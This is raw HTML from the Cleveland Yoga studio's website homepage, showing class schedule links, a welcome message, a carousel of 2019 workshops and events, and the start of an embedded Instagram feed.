menu-item-object-page menu-item-9876"><a href="https://www.clevelandyoga.com/contact/">Contact</a></li> <li id="menu-item-9915" class="menu-schedule menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-9915"><a href="#">Schedule</a> <ul class="sub-menu"> <li id="menu-item-9916" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9916"><a target="_blank" rel="noopener noreferrer" href="http://clients.mindbodyonline.com/ws.asp?studioid=-567&#038;stype=-7&#038;sTG=1&#038;sView=week&#038;sLoc=1">Beachwood Yoga</a></li> <li id="menu-item-9918" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9918"><a target="_blank" rel="noopener noreferrer" href="http://clients.mindbodyonline.com/ws.asp?studioid=-567&#038;stype=-7&#038;sTG=1&#038;sView=week&#038;sLoc=2">Little Italy Yoga</a></li> <li id="menu-item-9919" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9919"><a target="_blank" rel="noopener noreferrer" href="https://clients.mindbodyonline.com/classic/ws?studioid=-567&#038;stype=-7&#038;sTG=1&#038;sView=week&#038;sLoc=3">Westlake Yoga</a></li> <li id="menu-item-10255" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10255"><a href="https://clients.mindbodyonline.com/classic/ws?studioid=476956&#038;stype=-7&#038;sView=week&#038;sLoc=0">Concord Yoga</a></li> </ul> </li> </ul></div> </div> <div class="mobile-logo"><a href="https://www.clevelandyoga.com"><img src="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/images/logo.png"></a></div> </div><!-- 8 --> </div><!-- row --> </div><!-- container --> </header><!-- header --> <div class="container"> <div class="row"> <div id="home-content" class="col-md-12"> <div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1526390308888"><div class="wpb_wrapper"> <div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"> <!-- START REVOLUTION SLIDER 5.4.8.3 fullwidth mode --> <div id="rev_slider_1_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.8.3"> <ul> <!-- SLIDE --> <li data-index="rs-16" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-link="https://www.clevelandyoga.com/summer-immersion-teacher-training/" data-thumb="https://www.clevelandyoga.com/wp-content/uploads/2019/05/200-Hour-Summer-Immersion-Teacher-Training-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.clevelandyoga.com/wp-content/uploads/2019/05/200-Hour-Summer-Immersion-Teacher-Training.jpg" alt="" title="200-Hour-Summer-Immersion-Teacher-Training" width="1800" height="950" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina> <!-- LAYERS --> </li> <!-- SLIDE --> <li data-index="rs-6" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-link="http://www.clevelandyoga.com/yoga-classes/pricing/" data-thumb="https://www.clevelandyoga.com/wp-content/uploads/2019/01/ClevelandYogaConcord_NewStudentSpecials-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.clevelandyoga.com/wp-content/uploads/2019/01/ClevelandYogaConcord_NewStudentSpecials.jpg" alt="" title="ClevelandYoga_NewStudentSpecials" width="1400" height="750" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina> <!-- LAYERS --> </li> <!-- SLIDE --> <li data-index="rs-5" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-link="http://www.clevelandyoga.com/new-yoga-students/" data-thumb="https://www.clevelandyoga.com/wp-content/uploads/2019/01/WORKSHOPSANDEVENTS-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.clevelandyoga.com/wp-content/uploads/2019/01/WORKSHOPSANDEVENTS.jpg" alt="" title="WORKSHOPSANDEVENTS" width="1400" height="750" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina> <!-- LAYERS --> </li> </ul> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_1_1', gridwidth: [1240], gridheight: [675], sliderLayout: 'fullwidth'}); var revapi1, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") tpj.noConflict();} if(tpj("#rev_slider_1_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_1_1"); }else{ revapi1 = tpj("#rev_slider_1_1").show().revolution({ sliderType:"standard", jsFileLocation:"//www.clevelandyoga.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, navigation: { keyboardNavigation:"off", keyboard_direction: "horizontal", mouseScrollNavigation:"off", mouseScrollReverse:"default", onHoverStop:"off", arrows: { style:"hesperiden", enable:true, hide_onmobile:false, hide_onleave:false, tmp:'', left: { h_align:"left", v_align:"center", h_offset:20, v_offset:0 }, right: { h_align:"right", v_align:"center", h_offset:20, v_offset:0 } } }, visibilityLevels:[1240,1024,778,480], gridwidth:1240, gridheight:675, lazyType:"none", shadow:0, spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */ </script> <script> var htmlDivCss = unescape(".hesperiden.tparrows%20%7B%0A%09cursor%3Apointer%3B%0A%09background%3Argba%280%2C0%2C0%2C0.5%29%3B%0A%09width%3A40px%3B%0A%09height%3A40px%3B%0A%09position%3Aabsolute%3B%0A%09display%3Ablock%3B%0A%09z-index%3A100%3B%0A%20%20%20%20border-radius%3A%2050%25%3B%0A%7D%0A.hesperiden.tparrows%3Ahover%20%7B%0A%09background%3Argba%280%2C%200%2C%200%2C%201%29%3B%0A%7D%0A.hesperiden.tparrows%3Abefore%20%7B%0A%09font-family%3A%20%22revicons%22%3B%0A%09font-size%3A20px%3B%0A%09color%3Argb%28255%2C%20255%2C%20255%29%3B%0A%09display%3Ablock%3B%0A%09line-height%3A%2040px%3B%0A%09text-align%3A%20center%3B%0A%7D%0A.hesperiden.tparrows.tp-leftarrow%3Abefore%20%7B%0A%09content%3A%20%22%5Ce82c%22%3B%0A%20%20%20%20margin-left%3A-3px%3B%0A%7D%0A.hesperiden.tparrows.tp-rightarrow%3Abefore%20%7B%0A%09content%3A%20%22%5Ce82d%22%3B%0A%20%20%20%20margin-right%3A-3px%3B%0A%7D%0A"); var htmlDiv = document.getElementById('rs-plugin-settings-inline-css'); if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; } else{ var htmlDiv = document.createElement('div'); htmlDiv.innerHTML = '<style>' + htmlDivCss + '</style>'; document.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]); } </script> </div><!-- END REVOLUTION SLIDER --></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper"><div id="ultimate-heading-8555cdd75c15c1c3" class="uvc-heading ult-adjust-bottom-margin ultimate-heading-8555cdd75c15c1c3 uvc-3423 home-intro" data-hspacer="no_spacer" data-halign="center" style="text-align:center"><div class="uvc-heading-spacer no_spacer" style="top"></div><div class="uvc-main-heading ult-responsive" data-ultimate-target='.uvc-heading.ultimate-heading-8555cdd75c15c1c3 h1' data-responsive-json-new='{"font-size":"","line-height":""}' ><h1 style="font-weight:normal;margin-bottom:20px;">Welcome to Cleveland Yoga</h1></div><div class="uvc-sub-heading ult-responsive" data-ultimate-target='.uvc-heading.ultimate-heading-8555cdd75c15c1c3 .uvc-sub-heading ' data-responsive-json-new='{"font-size":"","line-height":""}' style="font-weight:normal;"></p> <p style="text-align: center;"><a href="/yoga-classes/">Cleveland Yoga Studios</a> are Affiliate Partners of <a href="http://www.baptisteyoga.com">Baptiste Yoga</a>. With over 100 yoga classes each week, experience personal growth with world-class teachers in our spacious studios located all over Northeast Ohio. Let us guide you on the path to physical and spiritual freedom!</p> <p></div></div></div></div></div></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1526389500197 vc_row-no-padding"><div class="home-section wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1533607813035"><div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <a href="/300-hour-advanced-teacher-training//" class="title clearfix"><div class="home-latest-excerpt transition">Advanced 300-Hour Training <br> GET THE DETAILS </div> <h4 class="transition">Yoga Teacher Training<i class="fab fab-arrow-right"></i></h4></a> </div> </div> </div></div></div><div class="home-section wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1533607840215"><div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <a href="/new-yoga-students/" class="title clearfix"><div class="home-latest-excerpt transition">READ THE FAQ’S <br> AND YOGA TIPS </div> <h4 class="transition">New Yoga Students<i class="fab fab-arrow-right"></i></h4></a> </div> </div> </div></div></div><div class="home-section wpb_column vc_column_container vc_col-sm-4 vc_col-has-fill"><div class="vc_column-inner vc_custom_1533607869430"><div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <a href="/yoga-programs/" class="title clearfix"><div class="home-latest-excerpt transition">CHECK OUT THE FULL VARIETY<br> OF CLEVELAND YOGA PROGRAMS </div> <h4 class="transition">Yoga Programs<i class="fab fab-arrow-right"></i></h4></a> </div> </div> </div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="vc_row wpb_row vc_row-fluid home-change-row"><div class="home-change wpb_column vc_column_container vc_col-sm-5"><div class="vc_column-inner"><div class="wpb_wrapper"><div id="ultimate-heading-9815cdd75c15ef3b" class="uvc-heading ult-adjust-bottom-margin ultimate-heading-9815cdd75c15ef3b uvc-2621 home-change-title" data-hspacer="no_spacer" data-halign="center" style="text-align:center"><div class="uvc-heading-spacer no_spacer" style="top"></div><div class="uvc-main-heading ult-responsive" data-ultimate-target='.uvc-heading.ultimate-heading-9815cdd75c15ef3b h2' data-responsive-json-new='{"font-size":"","line-height":""}' ><h2 style="font-weight:normal;margin-bottom:20px;">FIND YOUR EDGE</h2></div></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p style="text-align: left;">At Cleveland Yoga, we invite you to show up just as you are and be open to experiencing transformation!</p> <p style="text-align: left;">When you arrive, expect a clean, relaxing environment filled with a passionate community of yogis all on the journey to an authentic and balanced way of being.</p> <p style="text-align: left;">Experience exceptional teaching, focused on alignment and breath, and a staff ready to help you along your path.</p> <p style="text-align: left;">We invite you to roll out your yoga mat with us, dig deep within yourself, sweat a lot, love a lot and feel like you are at home again!</p> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-7"><div class="vc_column-inner vc_custom_1526389518833"><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_left vc_custom_1533927281454"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border_grey"><img width="555" height="378" src="https://www.clevelandyoga.com/wp-content/uploads/2018/08/tami_home.jpg" class="vc_single_image-img attachment-full" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2018/08/tami_home.jpg 555w, https://www.clevelandyoga.com/wp-content/uploads/2018/08/tami_home-300x204.jpg 300w" sizes="(max-width: 555px) 100vw, 555px" /></div> </figure> </div> </div></div></div></div><!-- Row Backgrounds --></p> <link rel="stylesheet" href="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/css/owl.carousel.min.css"> <link rel="stylesheet" href="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/css/owl.theme.default.min.css"> <script src="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/js/owl.carousel.min.js"></script> <h2 class="home-workshops-header">Workshops & Events</h2> <div class="owl-carousel"> <div class=""> <div class="home-workshops-thumb-container"><a href="https://www.clevelandyoga.com/workshops/the-grateful-dead/"><img width="800" height="450" src="https://www.clevelandyoga.com/wp-content/uploads/2019/03/Teds-Bday-Class-1.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2019/03/Teds-Bday-Class-1.jpg 800w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/Teds-Bday-Class-1-300x169.jpg 300w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/Teds-Bday-Class-1-768x432.jpg 768w" sizes="(max-width: 800px) 100vw, 800px" /></a></div> <div class="post-date-container"> <div class="post-date"> <span class="line-right-top">17</span> <span class="line-right-bottom">May</span> </div><!-- post date --> </div><!-- post-date-container --> <a href="https://www.clevelandyoga.com/workshops/the-grateful-dead/" class="home-workshops-title">The Grateful Dead with Ted</a> <div class="home-workshops-excerpt"><p>Ted turns 60 on May 17th and he invites you to come celebrate the occasion with him! Show up and shine though this sweaty, fun, [&#8230;]</p> </div> </div><!-- col-md-4 --> <div class=""> <div class="home-workshops-thumb-container"><a href="https://www.clevelandyoga.com/workshops/beginners-workshop-with-chris-ballard/"><img width="810" height="450" src="https://www.clevelandyoga.com/wp-content/uploads/2019/03/Beginner-Chris-Ballard.png" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2019/03/Beginner-Chris-Ballard.png 810w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/Beginner-Chris-Ballard-300x167.png 300w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/Beginner-Chris-Ballard-768x427.png 768w" sizes="(max-width: 810px) 100vw, 810px" /></a></div> <div class="post-date-container"> <div class="post-date"> <span class="line-right-top">18</span> <span class="line-right-bottom">May</span> </div><!-- post date --> </div><!-- post-date-container --> <a href="https://www.clevelandyoga.com/workshops/beginners-workshop-with-chris-ballard/" class="home-workshops-title">Beginners&#8217; Workshop with Chris Ballard</a> <div class="home-workshops-excerpt"><p>Specifically designed for new students, this workshop offers a warm, welcoming environment where everyone else is new to yoga too. You will be given a [&#8230;]</p> </div> </div><!-- col-md-4 --> <div class=""> <div class="home-workshops-thumb-container"><a href="https://www.clevelandyoga.com/workshops/beginners-workshop-ilene-friedman/"><img width="810" height="450" src="https://www.clevelandyoga.com/wp-content/uploads/2019/03/ILENE-BEGINNERS-WORKSHOP.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2019/03/ILENE-BEGINNERS-WORKSHOP.jpg 810w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/ILENE-BEGINNERS-WORKSHOP-300x167.jpg 300w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/ILENE-BEGINNERS-WORKSHOP-768x427.jpg 768w" sizes="(max-width: 810px) 100vw, 810px" /></a></div> <div class="post-date-container"> <div class="post-date"> <span class="line-right-top">25</span> <span class="line-right-bottom">May</span> </div><!-- post date --> </div><!-- post-date-container --> <a href="https://www.clevelandyoga.com/workshops/beginners-workshop-ilene-friedman/" class="home-workshops-title">Beginner&#8217;s Workshop with Ilene Friedman</a> <div class="home-workshops-excerpt"><p>Specifically designed for new students, this workshop offers a warm, welcoming environment where everyone else is new to yoga too. You will be given a [&#8230;]</p> </div> </div><!-- col-md-4 --> <div class=""> <div class="home-workshops-thumb-container"><a href="https://www.clevelandyoga.com/uncategorized/bliss-at-the-ballpark/"><img width="800" height="450" src="https://www.clevelandyoga.com/wp-content/uploads/2019/04/summer_outdoor.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2019/04/summer_outdoor.jpg 800w, https://www.clevelandyoga.com/wp-content/uploads/2019/04/summer_outdoor-300x169.jpg 300w, https://www.clevelandyoga.com/wp-content/uploads/2019/04/summer_outdoor-768x432.jpg 768w" sizes="(max-width: 800px) 100vw, 800px" /></a></div> <div class="post-date-container"> <div class="post-date"> <span class="line-right-top">8</span> <span class="line-right-bottom">Jun</span> </div><!-- post date --> </div><!-- post-date-container --> <a href="https://www.clevelandyoga.com/uncategorized/bliss-at-the-ballpark/" class="home-workshops-title">Bliss at the Ballpark</a> <div class="home-workshops-excerpt"><p>&nbsp; Bliss at the Ballpark is back for 2019!  In partnership with Inner Bliss Yoga Studio, experience a 60-minute yoga flow at Progressive Field will [&#8230;]</p> </div> </div><!-- col-md-4 --> <div class=""> <div class="home-workshops-thumb-container"><a href="https://www.clevelandyoga.com/workshops/cleveland-ohio-yoga-festival/"><img width="800" height="450" src="https://www.clevelandyoga.com/wp-content/uploads/2019/04/clevelandohioyogafestival.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2019/04/clevelandohioyogafestival.jpg 800w, https://www.clevelandyoga.com/wp-content/uploads/2019/04/clevelandohioyogafestival-300x169.jpg 300w, https://www.clevelandyoga.com/wp-content/uploads/2019/04/clevelandohioyogafestival-768x432.jpg 768w" sizes="(max-width: 800px) 100vw, 800px" /></a></div> <div class="post-date-container"> <div class="post-date"> <span class="line-right-top">22</span> <span class="line-right-bottom">Jun</span> </div><!-- post date --> </div><!-- post-date-container --> <a href="https://www.clevelandyoga.com/workshops/cleveland-ohio-yoga-festival/" class="home-workshops-title">Cleveland Ohio Yoga Festival</a> <div class="home-workshops-excerpt"><p>Explore. Experience. Energize. On June 22, 2019, join Cleveland Yoga and our teachers Tami Schneider, Marni Task and Becky Verner as they take the main [&#8230;]</p> </div> </div><!-- col-md-4 --> <div class=""> <div class="home-workshops-thumb-container"><a href="https://www.clevelandyoga.com/workshops/yoga-nidra-with-megan-velotta/"><img width="800" height="450" src="https://www.clevelandyoga.com/wp-content/uploads/2019/05/Yoga_Nidra_Beachwood.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2019/05/Yoga_Nidra_Beachwood.jpg 800w, https://www.clevelandyoga.com/wp-content/uploads/2019/05/Yoga_Nidra_Beachwood-300x169.jpg 300w, https://www.clevelandyoga.com/wp-content/uploads/2019/05/Yoga_Nidra_Beachwood-768x432.jpg 768w" sizes="(max-width: 800px) 100vw, 800px" /></a></div> <div class="post-date-container"> <div class="post-date"> <span class="line-right-top">23</span> <span class="line-right-bottom">Jun</span> </div><!-- post date --> </div><!-- post-date-container --> <a href="https://www.clevelandyoga.com/workshops/yoga-nidra-with-megan-velotta/" class="home-workshops-title">Yoga Nidra with Megan Velotta</a> <div class="home-workshops-excerpt"><p>Prepare to enter the sleep of the sages.  This workshop is a one-hour guided meditation in savasana. Yoga Nidra is a meditative deep relaxation state [&#8230;]</p> </div> </div><!-- col-md-4 --> <div class=""> <div class="home-workshops-thumb-container"><a href="https://www.clevelandyoga.com/workshops/unbreakable-training-for-veterans-and-first-responders/"><img width="800" height="450" src="https://www.clevelandyoga.com/wp-content/uploads/2019/03/Unbreakable-1.jpg" class="attachment-full size-full wp-post-image" alt="" srcset="https://www.clevelandyoga.com/wp-content/uploads/2019/03/Unbreakable-1.jpg 800w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/Unbreakable-1-300x169.jpg 300w, https://www.clevelandyoga.com/wp-content/uploads/2019/03/Unbreakable-1-768x432.jpg 768w" sizes="(max-width: 800px) 100vw, 800px" /></a></div> <div class="post-date-container"> <div class="post-date"> <span class="line-right-top">24</span> <span class="line-right-bottom">Aug</span> </div><!-- post date --> <span class="post-date-divider">-</span> <div class="post-date"> <span class="line-right-top">25</span> <span class="line-right-bottom">Aug</span> </div><!-- post date --> </div><!-- post-date-container --> <a href="https://www.clevelandyoga.com/workshops/unbreakable-training-for-veterans-and-first-responders/" class="home-workshops-title">Unbreakable Training for Veterans and First Responders</a> <div class="home-workshops-excerpt"><p>REGISTRATION NOW OPEN! &nbsp; The Unbreakable Training Program exists to train people who want to teach Baptiste Yoga to veterans, active duty and first responders. [&#8230;]</p> </div> </div><!-- col-md-4 --> </div><!-- owl carousel --> </div><!-- 12 --> </div><!-- row --> </div><!-- continer --> <footer> <div class="container" id="last"> <div class="row"> <div class="col-md-12 instagram-header"> <h2>Cleveland Yoga on Instagram</h2> Check out our latest Instagram photos and make sure to follow us! </div> </div> </div> <div id="sb_instagram" class="sbi sbi_mob_col_auto sbi_col_1" style="width:100%; " data-id="369873443" data-feed-id="sbi_369873443" data-num="20" data-res="auto" data-cols="6" data-options='{&quot;showcaption&quot;: &quot;&quot;, &quot;captionlength&quot;: &quot;50&quot;,&quot;feedID&quot;: &quot;369873443&quot;, &quot;captioncolor&quot;: &quot;&quot;,&quot;mid&quot;: &quot;M2E4MWE5Zg==&quot;, &quot;captionsize&quot;: &quot;13&quot;, &quot;showlikes&quot;: &quot;&quot;, &quot;likescolor&quot;: &quot;&quot;, &quot;likessize&quot;: &quot;13&quot;, &quot;sortby&quot;: &quot;none&quot;, &quot;hashtag&quot;: &quot;&quot;, &quot;order&quot;: &quot;top&quot;, &quot;type&quot;: &quot;user&quot;, &quot;hovercolor&quot;: &quot;0,0,0&quot;, &quot;hovertextcolor&quot;: &quot;255,255,255&quot;, &quot;hoverdisplay&quot;: &quot;username,date,instagram,&quot;, &quot;hovereffect&quot;: &quot;fade&quot;, &quot;headercolor&quot;: &quot;&quot;, &quot;headerprimarycolor&quot;: &quot;517fa4&quot;, &quot;headersecondarycolor&quot;: &quot;eeeeee&quot;, &quot;disablelightbox&quot;: &quot;false&quot;, &quot;captionlinks&quot;: &quot;false&quot;, &quot;disablecache&quot;: &quot;false&quot;, &quot;location&quot;: &quot;&quot;, &quot;coordinates&quot;: &quot;&quot;, &quot;single&quot;: &quot;&quot;,&quot;callback&quot;: &quot;OWRjMDczYTlkMGNjN.DFmNDhjZDdmOGE5MmQwMzUxMWM=&quot;, &quot;nummobile&quot;: &quot;20&quot;, &quot;colsmobile&quot;: &quot;1&quot;, &quot;lightboxcomments&quot;: &quot;true&quot;,&quot;numcomments&quot;: &quot;20&quot;,&quot;maxrequests&quot;: &quot;5&quot;, &quot;headerstyle&quot;: &quot;circle&quot;, &quot;showfollowers&quot;: &quot;true&quot;, &quot;showbio&quot;: &quot;true&quot;, &quot;carousel&quot;: &quot;[true, true, false, true, 5000, 1,true]&quot;, &quot;highlight&quot;: &quot;&quot;, &quot;imagepadding&quot;: &quot;0&quot;, &quot;imagepaddingunit&quot;: &quot;px&quot;, &quot;media&quot;: &quot;all&quot;, &quot;showusers&quot;: &quot;&quot;, &quot;includewords&quot;: &quot;&quot;, &quot;excludewords&quot;: &quot;&quot;, &quot;pageID&quot;: &quot;11491&quot;, &quot;sbiCacheExists&quot;: &quot;&quot;, &quot;sbiHeaderCache&quot;: &quot;&quot;, &quot;sbiWhiteList&quot;: &quot;&quot;, &quot;sbiWhiteListIds&quot;: &quot;&quot;}' data-sbi-lb-comments="true"><div id="sbi_images" class="sbi_carousel" data-fpl-json="{&quot;posts&quot;:[{&quot;id&quot;:&quot;2043766629892250376_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/e22961e54fe10b3854c3cb90542a8569/5CDFF6C0/t51.2885-15/e35/s150x150/60560447_792668847800702_243594944864616214_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/548b1050e5d9753dcb1866e59fddd957/5CDFAFCD/t51.2885-15/e35/s320x320/60560447_792668847800702_243594944864616214_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/2dc3f0c3cc0ce4f6e797d4652f15090b/5CDFBF21/t51.2885-15/sh0.08/e35/s640x640/60560447_792668847800702_243594944864616214_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1557856027&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;18060858061068858&quot;,&quot;text&quot;:&quot;Don\u2019t miss out on this epic 200-hour Yoga Teacher Training!\n\u2800\nJoin Tami @tamischneider27 and Ylonda @awaketomysoul for a blended 200-hour Immersion. Benefit from the combined knowledge of both teachers who each bring their own unique style to the yoga practice.\n\u2800\nWeek 1- Friday, June 14-Thursday, June 20\n\u2800\nWeek 2- Friday, July 19-Thursday, July 25\n\u2800\nQuestions? Email [email protected]\n\u2800\nOr check out the link in bio for more info and to register.&quot;,&quot;created_time&quot;:&quot;1557856027&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:17},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:0},&quot;type&quot;:&quot;video&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/Bxc6uvqhlsI/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[],&quot;videos&quot;:{&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/0e3a33ec6733e60761057c100096b486/5CDFFAF8/t50.2886-16/60831579_856876021313420_1190040545755826830_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjY0MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18048397492104143&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/11f375a0897cc8194e11cd86108324b3/5CE00009/t50.2886-16/60140327_201597217485289_1087043590111580503_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18048397489104143&quot;},&quot;low_bandwidth&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/11f375a0897cc8194e11cd86108324b3/5CE00009/t50.2886-16/60140327_201597217485289_1087043590111580503_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;18048397489104143&quot;}}},{&quot;id&quot;:&quot;2040933264983894422_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland 